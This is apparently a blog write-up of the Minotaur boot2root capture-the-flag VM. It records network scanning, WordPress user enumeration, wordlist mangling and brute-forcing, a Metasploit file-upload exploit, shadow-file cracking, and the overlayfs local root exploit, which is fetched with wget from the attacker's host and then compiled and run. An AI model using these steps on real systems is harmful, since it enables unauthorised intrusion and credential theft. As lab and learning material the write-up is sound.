SecTalks: BNE0x00 – Minotaur

Description

Minotaur CTF
Minotaur is a boot2root CTF. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. There are a few flag.txt files around to grab. /root/flag.txt is your ultimate goal.

Hints
This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Enumeration

There is some problem with finding the vm in my host-only network.
To tacle this problem I tried a horizontal scan at port 80.

nmap -v -O 192.168.56.0/24 -Pn -p 80

nmap1.JPG

After I found the host, I went for a vertical scan at the found host.

nmap -A -p- -T4 192.168.56.223

nmap2.JPG

Port 22 (SSH), 80 (web) and 2020 (FTP) are open. Also with port 2020 anonymous ftp login is allowed. After I tried the web server, which had nothing of importance, I tried SSH.
SSH was protected by authentication. So finally I went for the third and final option.

Anonymous FTP login

Let’s log in with the username ‘anonymous’.

ftp 192.168.56.223 2020

ftp

ftp2

Well that’s not it. My options are running short. I need more information. Time to give Dirb another try, but this time with a different list.

dirb http://192.168.56.223 /usr/share/wordlists/dirb/big.txt

dirb

Nice. Dirb found the directory ‘bull’ and it seems it runs on wordpress. Let’s take a look.
Looks like the website runs on WordPress version 4.2.2. Time to use wpscan.

wpscan –url http://192.168.56.223 –enumerate u

wpscan

There is the username. Now for the password. The hint in the description said I needed to generate my own wordlist, because it wasn’t on rockyou.txt. So let’s start generating wordlists.

cewl -w wordlist.txt http://192.168.56.223/bull/

wpscan –url http://192.168.56.223/bull/ –wordlist /wordlist.txt –username bully –threads 50

brute1

Nothing. Hmmmm. The hint was clear. My list isn’t sufficient enough. I need to mix up the collected words in my list more. Maybe I can find something with Google.
Not really anything I was looking for. But there were an awful lot of mentions to John the Ripper. Looking in Kali at the options of this program, there was an option for mangling words. With this information I started my searches on Google different and after a while I found a site with the right answer (https://www.win.tue.nl/~aeb/linux/john/john.html).

john –wordlist=wordlist.txt –rules –stdout > mangled-wordlist.txt

brute2

Yes! Jackpot!
Now let’s get back to a previously found vulnerability during the first wpscan.

file_upload

Time to start up metasploit and search the database for Slideshow Gallery exploit.

msfconsole

meterpreter

Now to get a shell and look around.

flag1

We have a flag. But looks like there is more…….

find / -print | grep -i flag.txt
/var/www/html/flag.txt
/tmp/flag.txtcat /var/www/html/flag.txt

flag2

Back to the shadow.bak file. Let’s download it and run it with John the Ripper.

meterpreter > download /tmp/shadow.bak
[*] downloading: /tmp/shadow.bak -> shadow.bak
[*] download : /tmp/shadow.bak -> shadow.bak

john

heffer@minotaur:/home$ cd heffer
heffer@minotaur:~$ ls
flag.txt
heffer@minotaur:~$ cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0

 

minotaur@minotaur:/home/heffer$ cd /home/minotaur
minotaur@minotaur:~$ ls
flag.txt peda
minotaur@minotaur:~$ cat flag.txt
Congrats! You’ve found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?

Why yes I can!

minotaur@minotaur:~$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.2 LTS”
NAME=”Ubuntu”
VERSION=”14.04.2 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.2 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”

So Ubuntu 14.04. That means I’m going for ‘overlayfs’ Local Root Shell (https://www.exploit-db.com/exploits/37292/).

minotaur@minotaur:~$ wget http://192.168.56.102/overlayfs.c
wget http://192.168.56.102/overlayfs.c
–2016-07-29 01:36:49– http://192.168.56.102/overlayfs.c
Connecting to 192.168.56.102:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘overlayfs.c’

100%[======================================>] 4,968 –.-K/s in 0s

2016-07-29 01:36:49 (152 MB/s) – ‘overlayfs.c’ saved [4968/4968]

minotaur@minotaur:~$ ls
ls
flag.txt overlayfs.c peda
minotaur@minotaur:~$ gcc overlayfs.c -o overlayfs
minotaur@minotaur:~$ chmod 777 overlayfs
minotaur@minotaur:~$ ls
flag.txt overlayfs overlayfs.c peda
minotaur@minotaur:~$ ./overlayfs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root

Woot! Now let’s get final flag.

# cd /root
# ls
flag.txt peda quotes.txt
# cat flag.txt
cat flag.txt

flag3

After a different approach I learned that the final flag was much simpler to uptain.
The whole getting root was not necessary seeing that user minotaur was able to run every program as root. But hey…..It was fun anyway.

Advertenties